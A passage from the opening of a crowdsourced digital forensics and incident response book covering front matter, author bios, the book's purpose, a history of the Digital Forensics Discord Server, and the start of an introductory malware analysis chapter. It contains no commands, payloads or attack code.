The Hitchhiker’s Guide to DFIR: Experiences
From Beginners and Experts
A crowdsourced Digital Forensics and Incident Response
(DFIR) book by the members of the Digital Forensics
Discord Server
Andrew Rathbun, ApexPredator, Kevin Pagano, Nisarg Suthar, John
Haynes, Guus Beckers, Barry Grundy, Tristram, Victor Heiland,
Jason Wilkins and Mark Berger
This book is for sale at
http://leanpub.com/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts
This version was published on 2022-11-28
ISBN 979-8-9863359-0-2
This is a Leanpub book. Leanpub empowers authors and publishers with the Lean Publishing
process. Lean Publishing is the act of publishing an in-progress ebook using lightweight tools and
many iterations to get reader feedback, pivot until you have the right book and build traction once
you do.
© 2022 Andrew Rathbun, ApexPredator, Kevin Pagano, Nisarg Suthar, John Haynes, Guus Beckers,
Barry Grundy, Tristram, Victor Heiland, Jason Wilkins and Mark Berger
This book is dedicated to all the practitioners and professionals in the niche of DFIR. It is for all
those, beginners and experts alike, who spend sleepless nights expanding their horizons of
knowledge in efforts to bring a change, small or big.
Happy Sleuthing! :)
Contents

Authors
Contributors

Chapter 0 - Introduction
    Purpose of This Book
    Community Participation
    Final Thoughts

Chapter 1 - History of the Digital Forensics Discord Server
    Introduction
    Beginnings in IRC
    Move to Discord
    Mobile Forensics Discord Server ⇒ Digital Forensics Discord Server
    Member Growth
    Hosting the 2020 Magnet Virtual Summit
    Community Engagement Within the Server
    Impact on the DFIR community
    Law Enforcement Personnel
    Forensic 4:cast Awards
    Future
    Conclusion

Chapter 2 - Basic Malware Analysis
    Introduction
    Basic Malware Analysis Tools
    Basic Malware Analysis Walkthrough
    Analysis Wrap-Up
    Conclusion

Chapter 3 - Password Cracking for Beginners
    Disclaimer & Overview
    Password Hashes
    Useful Software Tools
    Hash Extraction Techniques
    Hash Identification
    Attacking the Hash
    Wordlists
    Installing Hashcat
    “Brute-Forcing” with Hashcat
    Hashcat’s Potfile
    Dictionary (Wordlist) Attack with Hashcat
    Dictionary + Rules with Hashcat
    Robust Encryption Methods
    Complex Password Testing with Hashcat
    Searching a Dictionary for a Password
    Generating Custom Wordlists
    Paring Down Custom Wordlists
    Additional Resources and Advanced Techniques
    Conclusion
    References

Chapter 4 - Large Scale Android Application Analysis
    Overview
    Introduction
    Part 1 - Automated Analysis
    Part 2 - Manual Analysis
    Problem of Scale
    Part 3 - Using Autopsy, Jadx, and Python to Scrape and Parse Android Applications at Scale

Chapter 5 - De-Obfuscating PowerShell Payloads
    Introduction
    What Are We Dealing With?
    Stigma of Obfuscation
    Word of Caution
    Base64 Encoded Commands
    Base64 Inline Expressions
    GZip Compression
    Invoke Operator
    String Reversing
    Replace Chaining
    ASCII Translation
    Wrapping Up

Chapter 6 - Gamification of DFIR: Playing CTFs
    What is a CTF?
    Why am I qualified to talk about CTFs?
    Types of CTFs
    Evidence Aplenty
    Who’s Hosting?
    Why Play a CTF?
    Toss a Coin in the Tip Jar
    Takeaways

Chapter 7 - The Law Enforcement Digital Forensics Laboratory
    Setting Up and Getting Started
    Executive Cooperation
    Physical Requirements
    Selecting Tools
    Certification and Training
    Accreditation

Chapter 8 - Artifacts as Evidence
    Forensic Science
    Types of Artifacts
    What is Parsing?
    Artifact-Evidence Relation
    Examples
    References

Chapter 9 - Forensic imaging in a nutshell
    What is a disk image?
    Creating a disk image
    Memory forensics
    Next Steps and Conclusion

Chapter 10 - Linux and Digital Forensics
    What is Linux?
    Why Linux for Digital Forensics
    Choosing Linux
    Learning Linux Forensics
    Linux Forensics in Action
    Closing

Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage
    What is triage?
    What should be included in a triage?
    Forensic triage of one or a limited amount of hosts
    Scaling up to a medium-sized subnet
    Scaling up to an entire network
    Other tools
    Practicing triage
    Contributions and sources

Chapter 12 - Data recovery
    Logical data recovery
    Physical data recovery
    How to approach a data recovery case
    Imaging of unstable HDDs
    Flash drive data recovery

Errata
    Reporting Errata

Changelog
Authors
Andrew Rathbun
Andrew Rathbun is a DFIR professional with multiple years of experience in law enforcement and
the private sector. Andrew currently works at Kroll as a Vice President in Cyber Risk. Andrew is
involved in multiple community projects, including but not limited to the Digital Forensics Discord
Server¹, AboutDFIR², and multiple GitHub repositories³. You can find him on the DFIR Discord⁴.
ApexPredator
After many years at the top of the Systems Administration food chain, the ApexPredator switched
to the Cybersecurity food chain. The ApexPredator is working its way to the top, armed with an MS
in Cybersecurity and Information Assurance and numerous certifications, including OSCE3
(OSWE, OSEP, OSED), OSCP, OSWP, GREM, GXPN, GPEN, GWAPT, GSLC, GCIA, GCIH and
GSEC. Always hunting for more prey, it spends free time playing with malware analysis and exploit
development.
Barry Grundy
A U.S. Marine Corps veteran, Barry Grundy has been working in the field of digital forensics
since the mid-1990s. He started at the Ohio Attorney General’s office as a criminal investigator and
eventually joined U.S. Federal Law Enforcement as a digital forensics analyst and computer crimes
investigator in 2001. He holds a Bachelor of Science in Forensic Science from Ohio University and
a Master’s degree in Forensic Computing and Cybercrime Investigations from University College
Dublin.
Barry is the author and maintainer of the Law Enforcement and Forensic Examiner’s Introduction
to Linux (LinuxLEO⁵). This practical beginner’s guide to Linux as a digital forensics platform has
been available for over 20 years and has been used by a number of academic institutions and
law enforcement agencies around the world to introduce students of DFIR to Linux. Teaching,
particularly Linux forensics and open source DFIR tools, is his passion.
¹https://www.linkedin.com/company/digital-forensics-discord-server/
²https://aboutdfir.com/
³https://github.com/stars/AndrewRathbun/lists/my-projects
⁴http://discordapp.com/users/223211621185617920
⁵https://linuxleo.com
Guus Beckers
A lifelong IT aficionado, Guus Beckers (1990) completed the Network Forensic Research track
at Zuyd University of Applied Sciences as part of his Bachelor’s degree. In 2016, he attained his
Master’s degree at Maastricht University by completing the Forensics, Criminology and
Law master’s program. Guus currently works as a security consultant at Secura, leading the forensic
team and performing penetration testing.
Jason Wilkins
After serving in the US Navy for five years, Jason Wilkins began a career in firefighting and
emergency medicine. While serving the community in that capacity for fourteen years, he obtained
associate degrees in criminal justice and computer networking from Iowa Central Community
College online. He left the fire department in 2014 to pursue a network analyst position working
for a global tire manufacturer. Disillusioned by a lack of mission and purpose, he returned to public
safety in 2019 and began working as a crime & intelligence analyst for the local police department. It
was there that he developed the agency’s first digital forensics lab and started the N00B2PR04N6 blog.
In 2020, he was nominated as Newcomer of the Year in the Forensic 4:cast Awards and has
spoken at both the SANS Digital Forensics and Magnet Forensics Summits. He currently works as an
overseas contractor teaching digital forensics and is also an adjunct instructor for digital forensics
and incident response at Iowa Central Community College.
John Haynes
John Haynes works in law enforcement with a focus on digital forensics. John holds several
digital forensics certs including Cellebrite Certified Mobile Examiner (CCME) and Magnet Certified
Forensics Examiner (MCFE) and also holds the networking Cisco Certified Network Associate
(CCNA) certification. Having only been active in digital forensics since 2020, his background as
a curious nerd has served him well as he has just started exploring what digital forensics has to
offer.
John has taken a keen interest in password cracking after being introduced to the basics of Hashcat
at the NCFI. That laid the foundation for the password-cracking chapter in this book. You can
find a few of his videos on password cracking on YouTube⁶ or find him learning what he can on the
DFIR Discord⁷.
Kevin Pagano
Kevin Pagano is a digital forensics analyst, researcher, blogger and contributor to the open-source
community. He holds a Bachelor of Science in Computer Forensics from Bloomsburg University
⁶https://www.youtube.com/channel/UCJVXolxwB4x3EsBAzSACCTg
⁷http://discordapp.com/users/167135713006059520
of Pennsylvania and a Graduate Certificate in Digital Forensics from Champlain College. Kevin
is a member of the GIAC Advisory Board and holds several industry certifications, including the
GIAC Advanced Smartphone Forensics (GASF), GIAC Certified Forensic Examiner (GCFE),
GIAC Battlefield Forensics and Acquisition (GBFA), and Cellebrite Certified Mobile Examiner
(CCME) certifications, among others.
Kevin is the creator of the Forensics StartMe⁸ page and regularly shares his research on his blog⁹. He
is a published author with multiple peer-reviewed papers accepted through DFIR Review¹⁰. Kevin
also contributes to multiple open-source projects, including but not limited to ALEAPP¹¹, iLEAPP¹²,
RLEAPP¹³, CLEAPP¹⁴ and KAPE¹⁵.
Kevin is a regular competitor in the digital forensics CTF circuit. He has won First Place in the
Magnet User Summit DFIR CTF 2019, the Magnet Virtual Summit DFIR CTF 2021, the Magnet
User Summit DFIR CTF 2022, the Magnet Weekly CTF 2020, the Wi-Fighter Challenge v3 CTF, the
Belkasoft Europe 2021 CTF, and the BloomCON CTF in 2017, 2019, 2021 and 2022. He additionally is
a SANS DFIR NetWars Champion and NetWars Tournament of Champions winner and has earned
multiple Lethal Forensicator coins. Kevin is a 4-time Hacking Exposed Computer Forensic (HECF)
Blog Sunday Funday Winner.
In his spare time, Kevin likes to drink beers and design DFIR-themed designs for stickers, clothing,
and other swag. You can find him lurking on Twitter¹⁶ and on the DFIR Discord¹⁷.
Nisarg Suthar
Nisarg Suthar is a lifelong student and learner of DFIR. He is an aspiring digital forensic analyst
with a deep curiosity about why things work the way they do. He has experience with
malware analysis, reverse engineering, and forensics.
Nisarg is an independent researcher, a blue teamer, a CTF player, and a blogger¹⁸. He likes to read
DFIR material old and new, complete investigations on platforms like CyberDefenders and BTLO,
and network with other forensicators to learn and grow mutually.
He is also the developer of his most recent open-source project, Veritas¹⁹, a validation-purpose hex
viewer for people in DFIR. He is a big fan of all things FOSS.
Nisarg started tinkering with the disassembly of machine code, computer data, and reverse
engineering when he came across the world of modding, emulation, and ROM hacking. Making
his favorite games do what he wanted was a full-time hobby of writing code and stories.
⁸https://start.me/p/q6mw4Q/forensics
⁹https://www.stark4n6.com/
¹⁰https://dfir.pubpub.org/user/kevin-pagano
¹¹https://github.com/abrignoni/ALEAPP
¹²https://github.com/abrignoni/iLEAPP
¹³https://github.com/abrignoni/RLEAPP
¹⁴https://github.com/markmckinnon/cLeapp
¹⁵https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape
¹⁶https://twitter.com/kevinpagano3
¹⁷http://discordapp.com/users/597827073846935564
¹⁸https://sutharnisarg.medium.com/
¹⁹https://github.com/Nisarg12/Veritas
In his spare time, Nisarg likes to play and learn chess obsessively.
s3raph
Breaker of things (mostly things that they shouldn’t break). Writer of broken code (GitHub²⁰).
s3raph has worked in DFIR, Threat Hunting, Penetration Testing, and Cyber Defense and still
somehow has a job in this field.
Do You Want to Know More?²¹
Tristram
An avid blue team leader helping to secure the healthcare industry. Despite being blue team focused,
Tristram brings the enemy mindset to the table through various offensive skillsets to identify gaps
and validate existing controls.
²⁰https://github.com/s3raph-x00
²¹https://www.s3raph.com/
Contributors
Thank You,
• Holly Kennedy²² | Twitter²³ - For proofreading, editing, and making corrections!
• Oaker Min²⁴ | Blog²⁵ | Twitter²⁶ - For helping with the dead link checker²⁷!
• Klavdii²⁸ - For providing multiple²⁹ grammatical, spelling, and punctuation fixes as they were
reading the book.
• …and all other contributors³⁰ to the GitHub repository!
Every effort has been made in the preparation of this book to ensure the accuracy of the information
presented. However, the information contained in this book is sold without warranty, either express
or implied. Neither the authors nor contributors will be held liable for any damages caused or alleged
to have been caused directly or indirectly by this book.
²²https://github.com/hollykennedy
²³https://twitter.com/hollykennedy4n6
²⁴https://github.com/brootware
²⁵https://brootware.github.io/
²⁶https://twitter.com/brootware/
²⁷https://github.com/Digital-Forensics-Discord-Server/CrowdsourcedDFIRBook/issues/59
²⁸https://github.com/lordicode
²⁹https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/pulls?q=is%3Apr+author%3Alordicode+is%3Aclosed
³⁰https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/graphs/contributors
Chapter 0 - Introduction
By Andrew Rathbun³¹ | Twitter³² | Discord³³
Welcome to the first crowdsourced digital forensics and incident response (DFIR) book! To my
knowledge, this book is a first of its kind and hopefully not the last. To be very clear, this is not
your traditional DFIR book. It’s also not meant to be, and that’s okay. I came up with the idea for
the project that ultimately became the book you are reading right now when I stumbled upon a
website called Leanpub. Upon further research, I learned that books could be written on GitHub, a
platform that has become a large part of my life since May 15, 2020, when I completed my first
commit³⁴! As the Administrator of the Digital Forensics Discord Server, a community of which I am
very fond and proud, I felt that combining the idea of writing a book with the members of the
community that has given so much to me was a dream come true. This book is a grassroots effort
from people who, to my knowledge, have no experience doing anything they’re about to do in the
chapters that follow this Introduction, and that’s okay. This book isn’t perfect, and it doesn’t need
to be. This book documents multiple people stepping outside of their shells and putting themselves
out there to share the knowledge they’ve gained through the lens they’ve been granted in their
lives, with the hope of benefiting the greater DFIR community. Additionally, I hope this book will
inspire others to step outside their comfort zone and recognize that anyone can share knowledge,
thus leaving the world a better place than they found it.
Before getting into the chapters this book offers, I want to cover the mantra behind this book for the
reader to consider as they make their way through.
³¹https://github.com/AndrewRathbun
³²https://twitter.com/bunsofwrath12
³³http://discordapp.com/users/223211621185617920
³⁴https://github.com/EricZimmerman/KapeFiles/commit/972774117b42e6fafbd06fd9b80d29e9f1ca629a
Purpose of This Book
This book is purely a proof of concept that members of the Digital Forensics Discord Server
undertook to show that a DFIR book can be:
Crowdsourced
I love collaborating with people. I enjoy it when I can find people with the same mindset who “get
it” and all they want to do is move the ball forward on something greater than themselves. Everyone
contributing to this book “gets it”, but that doesn’t mean that if you’re reading this right now and
haven’t contributed, you don’t “get it”. It may just mean you haven’t found something that’s
resonated with you yet, or you’re not at a point in your career or, more importantly, your life where
you’re able to give back through the various methods of giving back to the DFIR community, and
that’s okay. Ultimately, this book is greater than the sum of its parts, and I’m thrilled to help provide
the opportunity for myself and others to collaborate with other members of the Digital Forensics
Discord Server to create something genuinely community-driven from idea to published book.
Open source
Since my first commit on GitHub in May 2020, I’ve been hooked on contributing to open-source
projects. The ability for the community to see the process unfold from A-Z, including but not limited
to the chapters being written, edited, and finalized for publication, is something I don’t think we’ve
seen yet, and I hope we see more of once this book is published and freely available for anyone to
consume.
Self-published
Self-publishing allows for as much control as possible for the content creators. Being able to self-
publish on Leanpub enables the content creators to modify the content at a moment’s notice without
the red tape involved when dealing with a publisher. As a result, this book can be updated at any
time with additional content until the authors deem the book to be complete, and thus a sequel
would be necessary.
Created using GitHub and Markua (modified version of
Markdown)
This goes along with the open-source point above. GitHub is a fantastic platform through which to
contribute to open-source projects. Markdown is commonly used on GitHub, and Leanpub utilizes a
Leanpub-flavored version of Markdown called Markua³⁵. Having gained a lot of experience with Markdown
in my travels in various GitHub repos, the thought of authoring a book using Markdown was very
appealing.
Accessible
This particular book will be freely available on Leanpub here³⁶. It will never cost you anything. Share
it far and wide!
Considering all the above, a legitimate DFIR resource
Frankly, this may not be at the level of a college textbook, but it’s also not meant to be. Again,
this project is intended to provide a platform for previously unknown contributors in the DFIR
community to provide the knowledge they’ve gained through research, experience, or otherwise.
When one is passionate enough about a subject that they’d volunteer to write a chapter for a
book like this, enabling that person to spread their wings and put themselves out there for others
to benefit from is an honor. Any errata in the chapters of this book will be addressed as they are
identified, and since we control the publishing tempo, we (or you) can update the book at any time.
³⁵http://markua.com/
³⁶https://leanpub.com/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts
Community Participation
One important aspect of creating this book was involving the community in deciding the book title³⁷
and the book cover³⁸.
Book Title
Originally, this book was called CrowdsourcedDFIRBook as a working title. Multiple polls on Google
Forms³⁹ were created with the following results:
Round 1
³⁷https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues/4
³⁸https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues/12
³⁹https://www.google.com/forms
Round 2
Book Cover
Originally, the book had no cover concept planned. As we got closer to the date of publishing the
initial version of the book, we discovered that Canva⁴⁰ allowed us to work up respectable book cover
candidates. Naturally, the book cover was put to a vote that would be decided by the community.
The first voting round contained 17 book cover candidates created using Canva.
Round 1
The following book covers were available as options during the first round of voting:
⁴⁰https://www.canva.com/
The final results for Round 1 were as follows:
Round 2
The following book covers were decided as the top three in Round 1:
The final results for Round 2 were as follows:
Therefore, the book cover was chosen by the community for a book that was made by the community
and for the community.
Final Thoughts
I don’t think any of the co-authors listed on the cover of this book ever thought they would be
published authors. I can certainly say that is the case for myself. This project proved that the barrier
to doing something as complicated as writing a book isn’t as high as it might seem, primarily thanks
to Leanpub. For all we know, the next prominent name in the DFIR world may have gotten their
start from volunteering a simple chapter to this book which sparked an interest in continuing the
path of knowledge sharing, content development, and overall DFIR community betterment. Only
time will tell! Either way, I’m proud of those who stepped up to do something uncomfortable,
something that requires effort and follow-through, and something they can ultimately be proud
of accomplishing when all is said and done. Ultimately, the authors win, the other contributors win,
and most importantly, the community wins!
Enjoy the book!
Chapter 1 - History of the Digital
Forensics Discord Server
By Andrew Rathbun⁴¹ | Twitter⁴² | Discord⁴³
Special thanks to Kevin Pagano for creating the Digital Forensics Discord Server logo!
Introduction
I felt it was prudent to choose this topic for this project because very few others could provide as
in-depth an account of the history of the Digital Forensics Discord Server. Having been a part of the
server since day one and actively monitoring it every day since, I felt like this was something that
needed to be immortalized before too much more time passes. As the server continues to grow and
life forges on, much like a DVR or event log, memories are overwritten with more current memories.
I very likely would not be able to write as detailed an account of this server’s history 5 years from
now as I can today. If anything, documenting this history now creates a starting point to build upon
over time.
⁴¹https://github.com/AndrewRathbun
⁴²https://twitter.com/bunsofwrath12
⁴³http://discordapp.com/users/223211621185617920
Beginnings in IRC
Long before the Digital Forensics Discord Server came to be, there existed a channel on an IRC⁴⁴
network called freenode⁴⁵. The channel was called #mobileforensics. This channel had its humble
beginnings on a Google Group run by Bob Elder of TeelTech⁴⁶, called the Physical and RAW Mobile
Forensics Group⁴⁷, which still exists today. To gain access to this Google Group, one had to have
attended a TeelTech training in the past. It was and continues to be a phenomenal resource for those
in Law Enforcement trying to navigate the waters of mobile forensic acquisitions.
In February 2016, I attended TeelTech’s JTAG/Chip-Off class taught by Mike Boettcher and gained
an invite to the Physical and RAW Mobile Forensics Group. I actively participated in the group to
the extent my knowledge and curiosity enabled me. Make no mistake, almost every other active
poster in that group was more experienced or knowledgeable than I. I thought there was no better
place or group of people to immerse myself in if I wanted to be the best version of myself.
On August 23, 2016, a user by the name of tupperwarez informed the group that they were starting
an IRC channel called #mobileforensics in an effort to “exchange ideas & have live discussions”.
I had been using forums for all of my internet life up until that point, and I think subconsciously I
was ready for something more. This was it! I also knew that IRC was a longstanding tradition, but
I had never dabbled with it and only had previous experience with messaging clients such as AOL
Instant Messenger (AIM)⁴⁸ and MSN Messenger⁴⁹ at the time. Thirteen minutes after the post by
tupperwarez went out, I was the first to respond to the thread, stating that I had joined.
⁴⁴https://en.wikipedia.org/wiki/Internet_Relay_Chat
⁴⁵https://en.wikipedia.org/wiki/Freenode
⁴⁶https://www.teeltech.com/
⁴⁷https://groups.google.com/g/physical-mobile-forensics/about?pli=1
⁴⁸https://en.wikipedia.org/wiki/AIM_(software)
⁴⁹https://en.wikipedia.org/wiki/Windows_Live_Messenger
Throughout the next year and a half, a small contingent of 7-15 people occupied this IRC channel at
any given time. We became a tight-knit group of examiners who relied on each other’s knowledge
and expertise to navigate challenges in our everyday casework. These problems often would relate to
performing advanced acquisition methods using Chip-Off, JTAG, or flasher boxes. The collaboration
was exactly what I was looking for, because together we were able to cast a wider net when searching
for the knowledge we needed to solve the problems we faced in our everyday investigations.
I recall utilizing an application called HexChat⁵⁰ to access this IRC channel. I’d have HexChat open
at all times along with my everyday workflow of software applications to perform my duties as a
Detective. For those reading this who have not used IRC before, know that it’s nowhere near as
feature-rich as Discord. Discord is much more modern, and IRC has been around since the early days
of the internet as we know it today. I bring this up because often we needed to share pictures with
each other as an exhibit for a problem we were encountering during the acquisition or decoding
process of a mobile device.
⁵⁰https://hexchat.github.io/
Move to Discord
Truthfully, I had forgotten the detail I’m about to share, but a reminder from one of our moderators
brought it all back to me. One of the main catalysts for moving from IRC was the fact that I was really
annoyed with having to upload a picture to Imgur and share the link on the IRC channel. It seemed so
inefficient and the process grew stale for me. I had created a Discord account back in September 2016
to join various special interest servers, so I had a fair amount of exposure to Discord’s capabilities
prior to the birth of the Digital Forensics Discord Server on March 26th, 2018.
I recall having aspirations for a move to Discord months prior to March 2018. For those who didn’t
use Discord around this time, it was primarily a platform marketed towards gamers. Using it for
things other than gaming wasn’t the intended purpose at the time, but the functionality it had was
everything I wanted in a chat client. Take all of the good features from every other chat application
I had used up until that point in time and add even more quality of life features and an awesome
mobile application, and I was sold. Discord was a breath of fresh air.
My call to move to Discord was met with nearly unanimous approval from members of the IRC
channel. As a result, the Mobile Forensics Discord Server was created!
Mobile Forensics Discord Server ⇒ Digital Forensics
Discord Server
The Mobile Forensics Discord Server enjoyed great success and rapid growth throughout its first year
of existence. The server’s growth was entirely driven by word of mouth and advertising on various
Google Groups. The list of channels maintained in the server was driven by member requests,
which quickly expanded beyond mobile devices. Over time, it became increasingly apparent that
branding the server as a Mobile Forensics server did not fully encompass the needs of the DFIR
community. As best I can determine, the Mobile Forensics Discord Server was rebranded to the
Digital Forensics Discord Server sometime around February 2019.
Since then, multiple channels have been added, renamed, and removed at the request of members.
Member Growth
Throughout its first 4 years (as of this writing), the Digital Forensics Discord Server has undergone
substantial growth. Below are some major membership milestones mined from my messages in the
#announcements channel over time.
Major Milestones
Date Member Count
3/26/2018 3
3/29/2018 116
4/3/2018 142
4/6/2018 171
4/11/2018 200
4/13/2018 250
5/30/2018 300
6/28/2018 375
7/9/2018 400
7/25/2018 450
8/20/2018 500
9/27/2018 600
11/16/2018 700
12/6/2018 800
1/10/2019 900
2/1/2019 1000
5/8/2019 1500
10/4/2019 2000
1/30/2020 2500
3/27/2020 3000
5/22/2020 4000
3/26/2021 6800
8/2/2021 8000
1/29/2022 9000
3/26/2022 9500
6/29/2022 10000
Hosting the 2020 Magnet Virtual Summit
In early 2020, shortly after the COVID-19 pandemic began, I was approached by representatives from
Magnet Forensics inquiring about the possibility of providing a centralized location for attendees
of the Magnet Virtual Summit 2020 to chat during presentations. Enthusiastically, we accepted the
idea and began to plan the logistics of hosting what likely would become a large influx of members.
I seem to recall nearly 1500 members joining during the month-long Magnet Virtual Summit 2020.
In retrospect, it’s clear that this was one of the first indicators that the server had “made it” in the
eyes of the community. Not only was the 2020 Magnet Virtual Summit a massive success in many
ways, but I also strongly feel its success influenced other conferences and entities to go virtual as well
as to adopt Discord as the means of communication for attendees. For instance, the SANS 2020 DFIR
Summit hosted a Discord server for its attendees a couple of months after the 2020 Magnet Virtual
Summit was hosted on the Digital Forensics Discord Server. I would like to think of the 2020 Magnet
Virtual Summit as a proof of concept for collaboration and communication among conference staff,
presenters, and attendees that succeeded beyond our expectations and influenced how conferences
were virtualized in 2020 and beyond.
Community Engagement Within the Server
One of the biggest divides that the Digital Forensics Discord Server was able to bridge was that
between customers and vendors. I recall spending a lot of time emailing every vendor I knew of,
asking them to provide representation in the server, because of the untapped potential of direct
customer and vendor communication, which simply didn’t exist at the time. Four years into the life of the server,
representatives from multiple digital forensic software vendors are mainstays in their products’
channels, providing an unprecedented amount of instant feedback between the customer and the
vendor. Historically, support was provided by email via a ticketing system, a vendor’s forum, or
another means that lacked the instant feedback mechanism that Discord provides. Not only are
customers able to interact directly with digital forensic software vendor employees who can provide
meaningful answers to help move a case forward, but the vendors can also receive product feedback
and observe interactions between examiners (their customers) to better understand how they can
serve those using their products.
I have no possible way to quantify this statement, but I would like to think overall there has been
a net positive influence on commonly utilized digital forensic software as a result of this direct
interaction with the customer base within the Digital Forensics Discord Server’s channels.
Impact on the DFIR community
In this section, I want to share some unique stories from people who have joined the Digital Forensics
Discord Server and what impact it has had on them.
One of the earliest stories I can remember is from someone who identified themselves as a detective
in Alaska. Specifically, this person stated they were a one-man digital forensics team at a police
department in a remote part of Alaska. They did not have another tech-savvy person to run ideas
past who was less than 3 hours away by car. Upon joining the Digital Forensics Discord Server,
they said that the community provided exactly what they needed. Prior to joining the server, they
were operating solo with no one to bounce ideas off when challenges arose in their investigations.
When I was a detective, I always had at least 2 other people in my office to run ideas past or ensure
I wasn’t forgetting something simple when I ran into roadblocks in my analyses. I can only imagine
the feeling of isolation of having my closest support being over 3 hours away from me. The Digital
Forensics Discord Server was a game changer because it provided something this person desperately
needed: support!
More recently, someone joined the server from a country for which I had never expected to have to
assign a Law Enforcement role. Someone posted in the #role-assignment channel stating they were
a police officer in Iraq. In a prior life, I was in the United States Marine Corps. I had actually served a
combat tour in Iraq in the infantry back in 2006-2007. Never in a million years would I have imagined
that someone from Iraq serving in Law Enforcement would join the Digital Forensics Discord Server.
To this day, this person is the only one occupying the Law Enforcement [Iraq] role, but when this
person joined the server I felt I had come full-circle. I engaged in conversation with this individual
and asked for updates on how the country was doing. It really warmed my heart, in all honesty. I
met so many wonderful people in that country during my 7-month deployment. To think that the
country is in a place to join the 73 other countries who have roles within the server put a smile on
my face and still does to this day.
Law Enforcement Personnel
Being former Law Enforcement myself, I understand the importance of jurisdiction and how laws
can differ from one jurisdiction to another. As a result, Law Enforcement roles were separated by
country from the early stages of the server for the purpose of delineating members from each other
due to various legal considerations that may vary from one jurisdiction to another. Because of that,
enumerating a list of the countries that a Law Enforcement role has been created for is likely the best
way to establish the reach the Digital Forensics Discord Server has in the global DFIR community.
Countries with roles assigned for Law Enforcement personnel are listed below:
As of November 2022:
Albania, Argentina, Australia, Austria, Bangladesh, Belgium, Bosnia, Brazil, Canada, Chile, China,
Colombia, Croatia, Cyprus, Czech Republic, Denmark, Dominican Republic, Estonia, Finland, France,
Germany, Greece, Grenada, Iceland, India, Iran, Iraq, Ireland, Israel, Italy, Jamaica, Japan, Korea,
Latvia, Lithuania, Luxembourg, Malaysia, Maldives, Malta, Mauritius, Mexico, Monaco, Mongolia,
Myanmar, Nepal, Netherlands, New Zealand, Nigeria, Norway, Pakistan, Peru, Philippines, Poland,
Portugal, Romania, Royal Cayman Islands, Russia, Senegal, Seychelles, Singapore, Slovakia, Slovenia,
Spain, Sweden, Switzerland, Taiwan, Turkey, Ukraine, United Arab Emirates, United Kingdom,
Uruguay, USA, Vietnam
To save you from counting, that’s 73 countries with a dedicated Law Enforcement role. This means
at least one person who has identified themselves as working in Law Enforcement in each of these
countries has joined the server and had this role assigned to them. With 195 countries⁵¹ recognized
in the world as of the writing of this book, the server has a reach into approximately 37% of those!
⁵¹https://www.worldatlas.com/articles/how-many-countries-are-in-the-world.html
Forensic 4:cast Awards
The Digital Forensics Discord Server was fortunate enough to enjoy success in the Forensic 4:cast
Awards⁵², as seen below:
Year Category Result
2020 Resource of the Year Winner⁵³
2021 Resource of the Year Winner⁵⁴
2022 Resource of the Year Winner⁵⁵
Future
The Digital Forensics Discord Server will continue to live and thrive so long as the community
wills it. I will always be active, but this server is and always has been far more than any single
person. As long as the members of the DFIR community keep showing up and engaging with each
other, the Digital Forensics Discord Server will never die…unless Discord ceases to exist, forcing the
community to migrate to a different platform. Let’s hope that doesn’t happen anytime soon!
All indications are that the server will continue to grow through coworker word-of-mouth, exposure
through training courses, and university programs sharing invites to the server to students. The
server has always been welcoming to all, from the high school student wanting to work in DFIR
someday, to people who’ve been involved in DFIR for decades, and everyone in between. This will
not ever change.
Administrator Contingency Plan
This server has become such an important part of my life (and the DFIR community) that I’ve created
a contingency plan. For those who are new to administering Discord servers, one important thing to
know is that only the member who is assigned as the Server Owner can delete the server. Currently,
that person is me, Andrew Rathbun. In the interest of ensuring the Digital Forensics Discord Server
lives far beyond all of us (assuming Discord is still around by that time), I’ve established a paper
trail for any other moderators to follow should anything happen to me and render me unable to
log back in to Discord. This paper trail will require a lot of effort and coordination with family
members/friends of mine to access my password vault and many other necessary items in order
to Transfer Ownership⁵⁶ so that the server can live on without any administrative hiccups. In the
unfortunate event that I can no longer log back into Discord, a OneNote page has been shared with
other moderators providing breadcrumbs to obtain the necessary information to transfer ownership
to another moderator so the server can be properly taken care of.
⁵²https://forensic4cast.com/forensic-4cast-awards/
⁵³https://forensic4cast.com/forensic-4cast-awards/2020-forensic-4cast-awards/
⁵⁴https://forensic4cast.com/forensic-4cast-awards/2021-forensic-4cast-awards/
⁵⁵LinkTBD
⁵⁶https://support.discord.com/hc/en-us/articles/216273938-How-do-I-transfer-server-ownership
Conclusion
Thank you to everyone who has helped this server become such an integral part of the DFIR
community.
Chapter 2 - Basic Malware Analysis
By ApexPredator⁵⁷ | Discord⁵⁸
Introduction
Malware has been around for as long as computers have been in common use. Any computer
program that performs malicious activities is classified as malware. There are many types of
malware, ranging from sophisticated self-propagating worms and destructive logic bombs to
ransomware and harmless pranks. Everyone who regularly uses a computer will encounter malware at some point.
This chapter will cover the basics of analyzing malware on an infected computer. It is targeted
towards hobbyists and beginners who are new to Digital Forensics and Incident Response (DFIR).
The goal of this chapter is to teach someone unfamiliar with the basic concepts of malware analysis
some Tactics, Techniques, and Procedures (TTPs) used to confirm that a computer is infected with
malware and how to begin extracting Indicators of Compromise (IOCs). It will cover the use of basic
tools. In this chapter, we will not cover intermediate or advanced topics such as reverse engineering
malware to discover its purpose or how it works.
The chapter starts with an introduction to basic malware analysis. It then covers some free tools
to use in basic malware analysis. The chapter culminates with a walkthrough of a canned analysis
on a piece of malware. The walkthrough wraps up with recommendations on where to go next to
progress to intermediate or advanced malware analysis.
I had numerous instances of friends and family asking me to figure out why their computer was
acting weird long before I moved into cybersecurity and received formal training in malware
analysis. I have had other cybersecurity professionals ask why it is not a waste of time to learn to
build Microsoft Office macro-based payloads when Microsoft is making it harder for users to run
the malicious code inside, to which I always respond, “Never underestimate the user’s desire
and ability to download and run anything sent to them.” People are going to download and execute
malware at some point, and if you are the IT expert, they will ask you to figure out what happened.
⁵⁷https://github.com/ApexPredator-InfoSec
⁵⁸http://discordapp.com/users/826227582202675210
One of my first instances of basic malware analysis was when I was in a situation that required
using a computer shared by multiple people to access the internet. I erred on the paranoid side before
